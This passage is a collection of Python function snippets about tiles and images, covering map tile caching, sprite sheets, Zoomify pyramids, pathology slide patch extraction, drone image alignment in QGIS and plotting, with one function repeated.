tile_data) \"\n \"VALUES (?, ?, ?, ?);\",\n (tile.z, tile.x, tiley, buffer(contents)))\n\n conn.commit()\n\n conn.close()\n # Done!", "def make_images(self):\n self._images = [tree.to_image() for tree in self.reaction_trees]\n self._update_route_dict(self._images, \"image\")", "def gen_tasks(self):\n for zoom in range(MIN_ZOOM, MAX_ZOOM + 1):\n seen = set() # (x, y)\n M = 2 ** zoom - 1\n # Find all areas suitable for zoom\n for area in Area.objects.filter(is_active=True,\n min_zoom__lte=zoom,\n max_zoom__gte=zoom):\n # Get area tiles\n SW = ll_to_xy(zoom, area.SW)\n NE = ll_to_xy(zoom, area.NE)\n left = max(SW[0] - PAD_TILES, 0)\n right = min(NE[0] + PAD_TILES, M)\n top = max(NE[1] - PAD_TILES, 0)\n bottom = min(SW[1] + PAD_TILES, M)\n a_size = (right - left + 1) * (bottom - top + 1)\n self.log(\"Checking area '%s' at zoom level %d \"\\\n \" (%d x %d = %d tiles)\" % (area.name, zoom,\n right - left + 1,\n bottom - top + 1,\n a_size))\n seen |= set((tc.x, tc.y) for tc in TileCache.objects.filter(\n map=self.map.id, zoom=zoom).only(\"x\", \"y\"))\n for x in range(left, right + 1):\n for y in range(top, bottom + 1):\n c = (x, y)\n if c in seen:\n continue\n seen.add(c)\n if not self.force:\n # Check tile is ready\n tc = TileCache.objects.filter(map=self.map.id,\n zoom=zoom, x=x,\n y=y).first()\n if tc and tc.ready:\n continue\n yield (zoom, x, y)", "def appendpics(pathofimg, w_sub, h_sub, step):\n num = 0\n dirlist = []\n images = [] # images in each folder\n for root, dirs, fileswer in os.walk(pathofimg):\n if len(dirs)!= 0:\n for dir in dirs:\n dirlist.append(dir)\n for rooert, dirwerwes, files in os.walk(pathofimg+'/'+dir):\n for file in files:\n if(file.endswith('.png')):\n images.append(Image.open(pathofimg+'/'+dir+'/'+file))\n if(len(images)==81):\n break\n target = montage(images, w_sub, h_sub, step)\n target.save(pathofimg +'/'+ dir + '.png', quality=100)\n else:\n dir = 'Generated'\n for file in fileswer:\n if (file.endswith('.png')):\n images.append(Image.open(pathofimg +'/'+ file))\n target1 = montage(images, w_sub, h_sub, step)\n savepath = pathofimg +'/'+ 'generated'\n os.makedirs(savepath)\n target1.save(savepath +'/'+ dir + '.png', quality=100)", "def 
tiles_to_images(wfc_ns, tile_grid, tile_catalog, tile_size, visualize=False, partial=False, grid_count=None):\n new_img = np.zeros((tile_grid.shape[0] * tile_size, tile_grid.shape[1] * tile_size, wfc_ns.channels), dtype=np.int64)\n if partial and (len(tile_grid.shape) > 2):\n for i in range(tile_grid.shape[0]):\n for j in range(tile_grid.shape[1]):\n for u in range(wfc_ns.tile_size):\n for v in range(wfc_ns.tile_size):\n pixel_merge_list = []\n for k in range(tile_grid.shape[2]):\n tile = tile_grid[i,j,k]\n ## If we want to display a partial pattern, it is helpful to\n ## be able to show empty cells. Therefore, in visualize mode,\n ## we use -1 as a magic number for a non-existant tile.\n pixel = None#[200, 0, 200]\n #print(tile)\n if (visualize) and ((-1 == tile) or (-2 == tile)):\n if (-1 == tile):\n pixel = [200, 0, 200]\n if 0 == (i + j) % 2:\n pixel = [255, 0, 255]\n else:\n pixel = [0, 255, 255]\n else:\n if (WFC_PARTIAL_BLANK != tile) and (WFC_NULL_VALUE != tile): # TODO: instead of -3, use MaskedArrays\n pixel = tile_catalog[tile][u,v]\n if not(pixel is None):\n pixel_merge_list.append(pixel)\n if len(pixel_merge_list) == 0:\n if 0 == (i + j) % 2:\n pixel_merge_list.append([255, 0, 255])\n else:\n pixel_merge_list.append([0, 172, 172])\n \n if len(pixel_merge_list) > 0:\n pixel_to_add = pixel_merge_list[0]\n if len(pixel_merge_list) > 1:\n pixel_to_add = [round(sum(x) / len(pixel_merge_list)) for x in zip(*pixel_merge_list)]\n try:\n while (len(pixel_to_add) < wfc_ns.channels):\n pixel_to_add.append(255)\n new_img[(i*wfc_ns.tile_size)+u, (j*wfc_ns.tile_size)+v] = pixel_to_add\n except TypeError as e:\n wfc_logger.warning(e)\n wfc_logger.warning(\"Tried to add {} from {}\".format(pixel_to_add, pixel_merge_list))\n else:\n for i in range(tile_grid.shape[0]):\n for j in range(tile_grid.shape[1]):\n tile = tile_grid[i,j]\n for u in range(wfc_ns.tile_size):\n for v in range(wfc_ns.tile_size):\n ## If we want to display a partial pattern, it is helpful to\n ## be able to show empty cells. 
Therefore, in visualize mode,\n ## we use -1 as a magic number for a non-existant tile.\n pixel = [200, 0, 200]\n #print(f\"tile: {tile}\")\n if (visualize) and ((-1 == tile) or (-2 == tile)):\n if (-1 == tile):\n if 0 == (i + j) % 2:\n pixel = [255, 0, 255]\n if (-2 == tile):\n pixel = [0, 255, 255]\n else:\n if (WFC_PARTIAL_BLANK != tile):\n pixel = tile_catalog[tile][u,v]\n # Watch out for images with more than 3 channels!\n new_img[(i*wfc_ns.tile_size)+u, (j*wfc_ns.tile_size)+v] = np.resize(pixel, new_img[(i*wfc_ns.tile_size)+u, (j*wfc_ns.tile_size)+v].shape)\n logging.debug('Output image shape is', new_img.shape)\n return new_img", "def get_images_from_sheet(sheet, width, height):\n sprites = []\n dest_rect = pygame.Rect((0, 0), (width, height))\n total = sheet.get_width() / width\n i = 0\n while i < total:\n image = pygame.Surface((width, height))\n image.blit(sheet, (0,0), ((width * i), 0, width, height))\n image.set_colorkey((0,0,0))\n sprites.append(image)\n i += 1\n\n return sprites", "def dynamic_tile(slide_name, row, col, small_tile_in_tile=False):\n tile_summary = dynamic_tiles(slide_name, small_tile_in_tile)\n tile = tile_summary.get_tile(row, col)\n return tile", "def build_tiles(cls):\n\n LOGGER.debug(\"Building tiles\")\n\n for tile_id in tiledata.TILE_DATA:\n if not Tile.tile_factory(tile_id):\n LOGGER.error(\"Could not construct tile with ID %d\", tile_id)\n sys.exit(1)", "def __init__(self, width, height, tilesize=256, tileformat='jpg'):\n\n self.tilesize = tilesize\n self.tileformat = tileformat\n imagesize = (width, height)\n tiles = (math.ceil(width / tilesize), math.ceil(height / tilesize))\n\n # Size (in tiles) for each tier of pyramid.\n self.tierSizeInTiles = []\n self.tierSizeInTiles.append(tiles)\n\n # Image size in pixels for each pyramid tierself\n self.tierImageSize = []\n self.tierImageSize.append(imagesize)\n\n while (imagesize[0] > tilesize or imagesize[1] > tilesize):\n imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2))\n tiles = (math.ceil(imagesize[0] / tilesize), math.ceil(imagesize[1] / tilesize))\n self.tierSizeInTiles.append(tiles)\n self.tierImageSize.append(imagesize)\n\n self.tierSizeInTiles.reverse()\n self.tierImageSize.reverse()\n\n # Depth of the Zoomify pyramid, number of tiers (zoom levels)\n self.numberOfTiers = len(self.tierSizeInTiles)\n\n # Number of tiles up to the given tier of pyramid.\n self.tileCountUpToTier = []\n self.tileCountUpToTier[0] = 0\n for i in range(1, self.numberOfTiers+1):\n self.tileCountUpToTier.append(\n self.tierSizeInTiles[i-1][0] * self.tierSizeInTiles[i-1][1] +\n self.tileCountUpToTier[i-1]\n )", "def __init__tiles__(self):\n return [[Tiles(i, j, Tiles.closed) for j in range(self.cols)] for i in range(self.rows)]", "def prepare_map(self):\n for y_coord, row in enumerate(self.contents):\n for x_coord, tile in enumerate(row):\n bit_map = self.get_tile_bitmap(tile)\n self.image[y_coord * TILE_SIZE:(y_coord+1) * TILE_SIZE,\n x_coord * TILE_SIZE:(x_coord+1) * TILE_SIZE] = bit_map", "def _iter_images_rects(self):\n image_x = self._margin\n image_y = self._margin\n total_width = self.width - 2 * self._margin\n total_height = self.height - self._texts_height - 2 * self._margin\n\n if len(self._images) == 1:\n image_width = total_width\n image_height = total_height\n elif 2 <= len(self._images) < 4:\n if self.is_portrait:\n image_width = total_width\n image_height = (total_height - (len(self._images) - 1) * self._margin) // len(self._images)\n else:\n image_width = (total_width - 
(len(self._images) - 1) * self._margin) // len(self._images)\n image_height = total_height\n else:\n image_width = (total_width - self._margin) // 2\n image_height = (total_height - self._margin) // 2\n\n yield image_x, image_y, image_width, image_height\n\n if 2 <= len(self._images) < 4:\n if self.is_portrait:\n image_y += image_height + self._margin\n else:\n image_x += image_width + self._margin\n yield image_x, image_y, image_width, image_height\n\n if 3 <= len(self._images) < 4:\n if self.is_portrait:\n image_y += image_height + self._margin\n else:\n image_x += image_width + self._margin\n yield image_x, image_y, image_width, image_height\n\n if len(self._images) == 4:\n image_x += image_width + self._margin\n yield image_x, image_y, image_width, image_height\n image_y += image_height + self._margin\n image_x = self._margin\n yield image_x, image_y, image_width, image_height\n image_x += image_width + self._margin\n yield image_x, image_y, image_width, image_height", "def extract_data(filename, num_images, starting_id, context_factor):\n imgs = []\n for i in range(starting_id, num_images+starting_id):\n imageid = \"satImage_%.3d\" % i\n image_filename = filename + imageid + \".png\"\n if os.path.isfile(image_filename):\n print ('Loading ' + image_filename)\n img = mpimg.imread(image_filename)\n\n\n imgs.append(img)\n else:\n print ('File ' + image_filename + ' does not exist')\n\n num_images = len(imgs)\n IMG_WIDTH = int(imgs[0].shape[0]/DOWNSCALE)\n IMG_HEIGHT = int(imgs[0].shape[1]/DOWNSCALE)\n N_PATCHES_PER_IMAGE = (IMG_WIDTH/IMG_PATCH_SIZE)*(IMG_HEIGHT/IMG_PATCH_SIZE)\n\n\n img_patches = [img_crop_context(imgs[i], IMG_PATCH_SIZE, IMG_PATCH_SIZE,context_factor, sub_mean=True) for i in range(num_images)]\n data = [img_patches[i][j] for i in range(len(img_patches)) for j in range(len(img_patches[i]))]\n data = np.asarray(data)\n return data", "def split_image_into_tiles_of_size(arr: Image, tile_w: int, tile_h: int, overlap: int):\n x_axis = -1\n y_axis = -2\n arr_width, arr_height = arr.shape[x_axis], arr.shape[y_axis]\n\n x_ntiles = (\n arr_width // tile_w if arr_width % tile_w == 0 else (arr_width // tile_w) + 1\n )\n y_ntiles = (\n arr_height // tile_h if arr_height % tile_h == 0 else (arr_height // tile_h) + 1\n )\n\n tiles = []\n\n # row\n for i in range(0, y_ntiles):\n # height of this tile\n ver_f = tile_h * i\n ver_t = ver_f + tile_h\n\n # col\n for j in range(0, x_ntiles):\n # width of this tile\n hor_f = tile_w * j\n hor_t = hor_f + tile_w\n\n tile = get_tile(arr, hor_f, hor_t, ver_f, ver_t, overlap)\n\n tiles.append(tile)\n tile_shape = [tile_h, tile_w]\n ntiles = dict(x=x_ntiles, y=y_ntiles)\n padding = dict(left=0, right=0, top=0, bottom=0)\n if arr_width % tile_w == 0:\n padding[\"right\"] = 0\n else:\n padding[\"right\"] = tile_w - (arr_width % tile_w)\n if arr_height % tile_h == 0:\n padding[\"bottom\"] = 0\n else:\n padding[\"bottom\"] = tile_h - (arr_height % tile_h)\n info = dict(tile_shape=tile_shape, ntiles=ntiles, overlap=overlap, padding=padding)\n return tiles, info", "def convert(self):\n self.tilewidth = int(self.tilewidth)\n self.tileheight = int(self.tileheight)\n self.width = int(self.width)\n self.height = int(self.height)\n self.pixel_width = self.width * self.tilewidth\n self.pixel_height = self.height * self.tileheight\n for layer in self.layers:\n self.named_layers[layer.name] = layer\n layer.opacity = float(layer.opacity)\n layer.x = int(layer.x)\n layer.y = int(layer.y)\n layer.width = int(layer.width)\n layer.height = int(layer.height)\n 
layer.pixel_width = layer.width * self.tilewidth\n layer.pixel_height = layer.height * self.tileheight\n layer.visible = bool(int(layer.visible))\n for tile_set in self.tile_sets:\n self.named_tile_sets[tile_set.name] = tile_set\n tile_set.spacing = int(tile_set.spacing)\n tile_set.margin = int(tile_set.margin)\n for img in tile_set.images:\n if img.trans:\n img.trans = (int(img.trans[:2], 16), int(img.trans[2:4], 16), int(img.trans[4:], 16))\n for obj_group in self.object_groups:\n obj_group.x = int(obj_group.x)\n obj_group.y = int(obj_group.y)\n obj_group.width = int(obj_group.width)\n obj_group.height = int(obj_group.height)\n for map_obj in obj_group.objects:\n map_obj.x = int(map_obj.x)\n map_obj.y = int(map_obj.y)\n map_obj.width = int(map_obj.width)\n map_obj.height = int(map_obj.height)", "def convert(self):\n self.tilewidth = int(self.tilewidth)\n self.tileheight = int(self.tileheight)\n self.width = int(self.width)\n self.height = int(self.height)\n self.pixel_width = self.width * self.tilewidth\n self.pixel_height = self.height * self.tileheight\n for layer in self.layers:\n self.named_layers[layer.name] = layer\n layer.opacity = float(layer.opacity)\n layer.x = int(layer.x)\n layer.y = int(layer.y)\n layer.width = int(layer.width)\n layer.height = int(layer.height)\n layer.pixel_width = layer.width * self.tilewidth\n layer.pixel_height = layer.height * self.tileheight\n layer.visible = bool(int(layer.visible))\n for tile_set in self.tile_sets:\n self.named_tile_sets[tile_set.name] = tile_set\n tile_set.spacing = int(tile_set.spacing)\n tile_set.margin = int(tile_set.margin)\n for img in tile_set.images:\n if img.trans:\n img.trans = (int(img.trans[:2], 16), int(img.trans[2:4], 16), int(img.trans[4:], 16))\n for obj_group in self.object_groups:\n obj_group.x = int(obj_group.x)\n obj_group.y = int(obj_group.y)\n obj_group.width = int(obj_group.width)\n obj_group.height = int(obj_group.height)\n for map_obj in obj_group.objects:\n map_obj.x = int(map_obj.x)\n map_obj.y = int(map_obj.y)\n map_obj.width = int(map_obj.width)\n map_obj.height = int(map_obj.height)", "def collect_patches(tif, mask, lev1, lev2, num_per_img, patch_size, patch_centre, save_folder, num_random_sample):\n table=pd.DataFrame(columns=['slide_name','x','y','label'])\n # init output lists\n patch_images_lev1 = []\n patch_images_lev2 = []\n patch_labels = []\n\n num_cancer = 0\n num_health = 0\n\n # file paths\n slide_path = tif\n mask_path = mask\n f_num = slide_path.split('/')[-1].split('.')[0]\n slide_name=os.path.basename(slide_path).rstrip('.tif')\n\n # get images with OpenSlide\n slide = open_slide(slide_path)\n tumor_mask = open_slide(mask_path)\n\n # read level 4 slide image and mask - for the purposes of getting healthy\n # and tumor pixels\n # 读取slide和mask,read_slide就是返回一shape == (height, width, 3) #3:rgb\n slide_image = read_slide(slide,\n x=0,\n y=0,\n level=4,\n width=tumor_mask.level_dimensions[4][0],\n height=tumor_mask.level_dimensions[4][1])\n\n mask_image = read_slide(tumor_mask,\n x=0,\n y=0,\n level=4,\n width=tumor_mask.level_dimensions[4][0],\n height=tumor_mask.level_dimensions[4][1])\n\n\n\n print('--------checking mask image shape after read slide', mask_image.shape)\n print('--------checking slide_image shape after read slide', slide_image.shape)\n mask_image = mask_image[:, :, 0]\n # print ('--------checking mask image shape after mask_image[:, :, 0]', mask_image.siz)\n\n # get a list of tumor pixels at level 4\n mask_lev_4_cancer = np.nonzero(mask_image)\n # print ('checking length of 
mask_lev_4_cancer', mask_lev_4_cancer)\n\n # make a healthy tissue mask by subtracting tumor mask from tissue mask\n tissue_pixels = find_tissue_pixels(slide_image)\n # print ('---checking tissue_pixels ', tissue_pixels )\n tissue_regions = apply_mask(slide_image, tissue_pixels)\n # print ('------checking tissue_regions', tissue_regions)\n\n mask_health = tissue_regions[:, :, 0] - mask_image\n # print ('------checking mask_health = tissue_regions[:, :, 0] - mask_image-------', mask_health.shape)\n mask_health = mask_health > 0\n # print ('------checking mask_health = mask_health > 0---------', mask_health.shape)\n mask_health = mask_health.astype('int')\n # print ('------checking mask_health = mask_health.astypeint-------', mask_health.shape)\n\n # get a list of healthy pixels at level 4\n mask_lev_4_health = np.nonzero(mask_health)\n # print ('------checking mask_lev_4_health----', len(mask_lev_4_health[0]))\n\n # print()\n # print('lenmask_lev_4_cancerpatch_size ** 2, lenmask_lev_4_health0patch_size ** 2:',\n # len(mask_lev_4_cancer[0]) // (patch_size ** 2), len(mask_lev_4_health[0]) // (patch_size ** 2))\n\n # -------------------------------------------------------------\n if len(mask_lev_4_cancer[0]) != 0:\n print('extracting tumor patches------')\n #logging.info('extracting tumor patches')\n # extract TUMOR patches\n\n # get a random sample of tumor pixels\n # Note: did random.sample here rather than random.choice inside the while loop because os speed\n random_sample = min(len(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])))-1,num_random_sample)\n sample_cancer = random.sample(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])), random_sample)\n\n c = 0\n idx= 0\n # continue until enough patches extracted\n while num_cancer < num_per_img:\n c += 1\n if c == random_sample:\n break\n # print('-----checking-------c', c)\n # if c % 10 == 0:\n # print(c, end=', ')\n\n # get the next pixel from the sample - coordinates at level4\n (x4, y4) = sample_cancer[c]\n\n # convert level 4 coordinates to level 0\n x0 = x4 * (2 ** 4)\n y0 = y4 * (2 ** 4)\n \n # extract patches at lev1 CENTERED at that pixel\n patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \\\n get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)\n\n # calc tissue ratio in that patch\n tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)\n\n # double-check if the patch has tumor\n has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)\n\n # if it has more than 50% tissue and has tumor\n if (tissue_ratio > 0.5) & has_cancer:\n # collect lev1 patch\n num_cancer += 1\n table.loc[idx]=(slide_name,x0,y0,1)\n idx+=1\n\n # -------------------------------------------------------------\n # extract HEALTHY patches\n # repeat the above for the healthy pixels\n print('extracting normal patches------')\n #logging.info('extracting normal patches')\n\n # print()\n # get a random sample of healthy pixels\n random_sample = min(len(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])))-1, num_random_sample)\n sample_health = random.sample(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])), random_sample)\n # print('-------checking sample_health------', len(sample_health))\n\n c = 0\n\n # get healthy images\n while num_health < num_per_img:\n c += 1\n if c == random_sample:\n break\n # if c % 10 == 0:\n # print(c, end=', ')\n\n # get the next pixel from the sample - coordinates at level 4\n (x4, y4) = sample_health[c]\n\n # convert level 4 coordinates to level 0\n x0 = x4 * (2 ** 4)\n y0 = y4 * (2 ** 
4)\n\n # extract patches at lev1 CENTERED at that pixel\n patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \\\n get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)\n\n # calc tissue ratio in that patch\n tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)\n\n # check if the patch has tumor\n has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)\n\n # if it has more than 50% tissue and doens't have tumor in the 128x128 centre\n if (tissue_ratio > 0.5) & (not has_cancer):\n\n # collect lev1 patch\n num_health += 1\n table.loc[idx]=(slide_name,x0,y0,0)\n idx+=1\n table.to_csv(save_folder,header=True)\n return table", "def generate_image_grid(sess, df, filenames,op, op2):\n #x_points = np.arange(0, 1, 1.5).astype(np.float32)\n #y_points = np.arange(0, 1, 1.5).astype(np.float32)\n\n nx, ny = 12, 1\n #plt.subplot()\n gs = gridspec.GridSpec(nx, ny, hspace=1, wspace=0.05)\n # input_x = sess.run(op2, feed_dict={x_input: df[0:24]})\n #\n # plt.imshow(np.array(df[0].tolist()).reshape(28, 28), cmap='gray')\n # plt.show()\n # x = sess.run(op, feed_dict={decoder_input: input_x[0].reshape(1,2)})\n # img = np.array(x.tolist()).reshape(28, 28)\n #\n # plt.imshow(img, cmap='gray')\n # plt.show()\n\n \"\"\" grid \"\"\"\n input_x = sess.run(op2, feed_dict={x_input: df[0:24]})\n for i, g in enumerate(gs):\n\n x = sess.run(op, feed_dict={decoder_input: input_x[i].reshape(1,2)})\n ax = plt.subplot(g)\n img = np.array(x.tolist()).reshape(28, 28)\n ax.imshow(img, cmap='gray')\n ax.set_xticks([])\n ax.set_yticks([])\n #ax.set_aspect('auto')\n ax.set_title(filenames[i])\n plt.show()\n\n for i, g in enumerate(gs):\n\n ax = plt.subplot(g)\n img = np.array(df[i].tolist()).reshape(28, 28)\n ax.imshow(img, cmap='gray')\n ax.set_xticks([])\n ax.set_yticks([])\n #ax.set_aspect('auto')\n ax.set_title(filenames[i])\n plt.show()", "def test_tiled_iterator_nogen(self):\n tile_no_gen = TiledIterator(\n twod_image=self.test_file_1, overlap_log_2=0\n )\n tile = next(tile_no_gen)\n\n shape = tile.shape\n\n # defaults\n self.assertTrue(shape[0] == 32)\n self.assertTrue(shape[1] == 65)\n self.assertTrue(shape[2] == 65)\n self.assertTrue(shape[3] == 1)\n\n #\n img0 = self.test_data_1[0:65, 0:65]\n np.array_equal(tile, img0)\n\n # no overlap\n tile = next(tile_no_gen)\n img0 = self.test_data_1[65 : 2 * 65, 65 : 2 * 65]\n np.array_equal(tile, img0)\n\n # --- overlapping --- #\n tile_no_gen = TiledIterator(\n twod_image=self.test_file_1, overlap_log_2=2\n )\n\n tile = next(tile_no_gen)\n\n shape = tile.shape\n\n # defaults\n self.assertTrue(shape[0] == 32)\n self.assertTrue(shape[1] == 65)\n self.assertTrue(shape[2] == 65)\n self.assertTrue(shape[3] == 1)\n\n #\n img0 = self.test_data_1[0:65, 0:65]\n np.array_equal(tile, img0)\n\n # 64/(2**2) = 16\n tile = next(tile_no_gen)\n img0 = self.test_data_1[16 : 16 + 65, 16 : 16 + 65]\n np.array_equal(tile, img0)", "def process(self, step_guess_orientation=True, step_advanced_alignement=True,\n step_gen_worldfiles=True, step_load_worldfiles=True,\n step_gen_vrts=True, step_load_vrts=True,\n step_load_debug=True ):\n\n QgsMessageLog.logMessage(\"1/ Instantiating all images...\", \"QuickDroneMap\", 0)\n for root, dirs, files in os.walk(self.folder):\n for file in files:\n if file.endswith(\".jpg\") or file.endswith(\".JPG\"):\n image_path = os.path.join(root, file)\n image = Image(self, image_path)\n self.images.append(image)\n self.images = self.images[70:90]\n # for i in [301,300,329]: # 3 images, transform fails on all of them\n # for i in [397,398,364]: # 
3 images, transform fails on one of them\n # for i in [377,380,381]: # 3 images, transform works on all of them\n # path = \"C:\\\\Users\\\\Olivier\\\\Dropbox\\\\Affaires\\\\SPC\\\\Sources\\\\quickdronemap\\\\test\\\\data\\\\DJI_{0:04d}.JPG\".format(i)\n # self.images.append(Image(self, path))\n\n QgsMessageLog.logMessage(\"2/ Assigning ids\", \"QuickDroneMap\", 0)\n for i, image in enumerate(self.images):\n image.id = i\n\n\n QgsMessageLog.logMessage(\"2/ Loading image attributes and parsing exif tags...\", \"QuickDroneMap\", 0)\n for image in self.images:\n image.set_attributes()\n\n if step_guess_orientation:\n QgsMessageLog.logMessage(\"3/ Building image sequences...\", \"QuickDroneMap\", 0)\n sorted_images = sorted(self.images, key=lambda x: x.timestamp)\n for i in range(len(sorted_images)):\n\n prev_image = sorted_images[i-1] if i>0 else None\n image = sorted_images[i]\n next_image = sorted_images[i+1] if i<len(sorted_images)-1 else None\n\n if prev_image is None or next_image is None:\n continue\n\n angle_p_i = math.atan2(image.point.x()-prev_image.point.x(),-image.point.y()+prev_image.point.y())\n angle_i_n = math.atan2(next_image.point.x()-image.point.x(),-next_image.point.y()+image.point.y())\n\n # Checking if the three images are aligned (if not, we're probably at an angle)\n dA = absolute_angle_difference(angle_p_i, angle_i_n)\n if dA > ANGLE_THRESHOLD:\n continue\n\n # Checking if the three images are near enough timewise, if not, it could be separate flights\n dT1 = image.timestamp - prev_image.timestamp\n dT2 = next_image.timestamp - image.timestamp\n if dT1 > TIME_THRESHOLD or dT2 > TIME_THRESHOLD:\n continue\n\n prev_image.next_image = image\n image.prev_image = prev_image\n image.next_image = next_image\n next_image.prev_image = image\n\n QgsMessageLog.logMessage(\"4/ Deriving orientation from image sequence\", \"QuickDroneMap\", 0)\n for image in self.images:\n # if the direction wasn't set in the Exif tags, we derive it from the image sequences\n if image.direction is None:\n img_a = image.prev_image or image \n img_b = image.next_image or image\n image.angle = math.atan2(img_b.point.x()-img_a.point.x(),-img_b.point.y()+img_a.point.y())\n\n if step_advanced_alignement:\n QgsMessageLog.logMessage(\"5/ Building image neighbourhood graph...\", \"QuickDroneMap\", 0)\n from scipy.spatial import Delaunay\n points = [(i.point.x(),i.point.y()) for i in self.images]\n triangulation = Delaunay(points)\n\n done = [[False for _i2 in self.images] for _i1 in self.images]\n for tri in triangulation.simplices:\n i1,i2,i3 = tri\n if not done[i1][i2]:\n e = Edge(self.images[i1], self.images[i2])\n self.edges.append(e)\n self.images[i1].edges.append(e)\n self.images[i2].edges.append(e)\n done[i1][i2] = True\n if not done[i1][i3]:\n e = Edge(self.images[i1], self.images[i3])\n self.edges.append(e)\n self.images[i1].edges.append(e)\n self.images[i3].edges.append(e)\n done[i1][i3] = True\n if not done[i2][i3]:\n e = Edge(self.images[i2], self.images[i3])\n self.edges.append(e)\n self.images[i2].edges.append(e)\n self.images[i3].edges.append(e)\n done[i2][i3] = True\n\n QgsMessageLog.logMessage(\"6/ Computing similarities\", \"QuickDroneMap\", 0)\n for i, edge in enumerate(self.edges):\n QgsMessageLog.logMessage(\"Done {} out of {}\".format(i,len(self.edges)), \"QuickDroneMap\", 0)\n QApplication.processEvents()\n edge.compute_transform()\n\n # initial_guess_np, _ = self.get_initial_values_and_bounds()\n # QgsMessageLog.logMessage(\"Initial fitness is 
{}\".format(self.calculate_fitness(initial_guess_np)), \"QuickDroneMap\", 0)\n\n # print(\"TESTING QUALITY OF SIMILARITY (disable optimization to do this)\")\n # done = []\n # edges_to_delete = []\n # for edge in self.edges:\n # QApplication.processEvents()\n\n # if edge.imageA in done or edge.imageB in done:\n # edges_to_delete.append(edge)\n # continue\n\n # done.append(edge.imageA)\n # done.append(edge.imageB)\n\n # d_angle = edge.angle\n # edge.imageB.angle = edge.imageA.angle + d_angle\n\n # f_scale = edge.scale\n # edge.imageB.scale = edge.imageA.scale * f_scale\n\n # d_point = QgsPointXY(edge.tvec[0],edge.tvec[1])\n # d_point = d_point.rotated(edge.imageA.angle)\n # d_point *= edge.imageA.pixel_size/DOWNSCALING_FACTOR\n # edge.imageB.point = edge.imageA.point + d_point\n # for edge in edges_to_delete:\n # self.edges.remove(edge)\n\n\n # print(\"AFTER PROTOTYPE PLACEMENT\")\n # initial_guess_np, _ = self.get_initial_values_and_bounds()\n # self.calculate_fitness(initial_guess_np)\n\n\n QgsMessageLog.logMessage(\"7/ Optimizing\", \"QuickDroneMap\", 0)\n QApplication.processEvents()\n\n initial_guess_np, bounds = self.get_initial_values_and_bounds() \n # res_1 = least_squares(calculate_fitness, initial_guess_np, bounds=([b[0] for b in bounds],[b[1] for b in bounds]))\n res_1 = minimize(self.calculate_fitness, initial_guess_np, bounds=bounds)\n\n for image in self.images:\n px = res_1.x[image.id*4+0]\n py = res_1.x[image.id*4+1]\n pa = res_1.x[image.id*4+2]\n ps = res_1.x[image.id*4+3]\n image.point = QgsPointXY(px, py)\n image.angle = pa\n image.psize = ps\n\n initial_guess_np, _ = self.get_initial_values_and_bounds()\n QgsMessageLog.logMessage(\"After optimization fitness is {}\".format(self.calculate_fitness(initial_guess_np)), \"QuickDroneMap\", 0)\n \n QgsMessageLog.logMessage(\"8/ Computing all transforms...\", \"QuickDroneMap\", 0)\n for image in self.images:\n image.update_transform()\n\n if step_gen_worldfiles:\n QgsMessageLog.logMessage(\"9a/ Creating and loading worldfiles\", \"QuickDroneMap\", 0)\n for image in self.images:\n image.write_worldfile()\n if step_load_worldfiles:\n image.load_worldfile(self.iface)\n\n if step_gen_vrts:\n QgsMessageLog.logMessage(\"9b/ Creating and loading vrts\", \"QuickDroneMap\", 0)\n for image in self.images:\n image.write_vrt()\n if step_load_vrts:\n image.load_vrt(self.iface)\n\n if step_load_debug:\n QgsMessageLog.logMessage(\"10/ Creating debug jsons files\", \"QuickDroneMap\", 0)\n edg_data = {\"type\": \"FeatureCollection\",\"features\": [], \"crs\": {\"type\": \"EPSG\",\"properties\": {\"code\": 32628}}} # TODO : use self.crs\n for edge in self.edges:\n coords = [[edge.imageA.point.x(), edge.imageA.point.y()],[edge.imageB.point.x(), edge.imageB.point.y()]]\n props = {k:v for (k,v) in vars(edge).items()}\n props['angle_a'] = edge.imageA.angle\n props['angle_b'] = edge.imageB.angle\n feature = {\"type\": \"Feature\",\"properties\": props,\"geometry\": {\"type\": \"LineString\",\"coordinates\": coords}}\n edg_data['features'].append(feature)\n \n edg_file = tempfile.NamedTemporaryFile(mode='w+', suffix='.geojson', delete=False)\n json.dump(edg_data, edg_file, default=lambda o: str(o))\n edg_file.close()\n layer = self.iface.addVectorLayer(edg_file.name,\"[DEBUG] Edges\",\"ogr\")\n layer.loadNamedStyle(os.path.join(os.path.dirname(os.path.realpath(__file__)),'debug_edges_style.qml'))\n \n graph_data = {\"type\": \"FeatureCollection\",\"features\": [], \"crs\": {\"type\": \"EPSG\",\"properties\": {\"code\": 4326}}} # TODO : use self.crs\n 
for edge in self.edges:\n coords = [[edge.imageA.lon, edge.imageA.lat],[edge.imageB.lon, edge.imageB.lat]]\n props = {k:v for (k,v) in vars(edge).items()}\n feature = {\"type\": \"Feature\",\"properties\": props,\"geometry\": {\"type\": \"LineString\",\"coordinates\": coords}}\n graph_data['features'].append(feature)\n\n graph_file = tempfile.NamedTemporaryFile(mode='w+', suffix='.geojson', delete=False)\n json.dump(graph_data, graph_file, default=lambda o: str(o))\n graph_file.close()\n layer = self.iface.addVectorLayer(graph_file.name,\"[DEBUG] Graph\",\"ogr\")\n layer.loadNamedStyle(os.path.join(os.path.dirname(os.path.realpath(__file__)),'debug_graph_style.qml'))", "def images_steps(login, horizon):\n return ImagesSteps(horizon)", "def buildTiles(self, items, attributes):\n pass", "def show_images(images, level,cols = 1,titles = None):\n assert((titles is None)or (len(images) == len(titles)))\n n_images = len(images)\n if titles is None: titles = ['Image (%d)' % i for i in range(1,n_images + 1)]\n fig = plt.figure()\n for n, (image, title) in enumerate(zip(images, titles)):\n a = fig.add_subplot(cols, np.ceil(n_images/float(cols)), n + 1)\n if image.ndim == 2:\n plt.gray()\n plt.imshow(image)\n a.set_title(title)\n fig.set_size_inches(np.array(fig.get_size_inches()) * n_images)\n 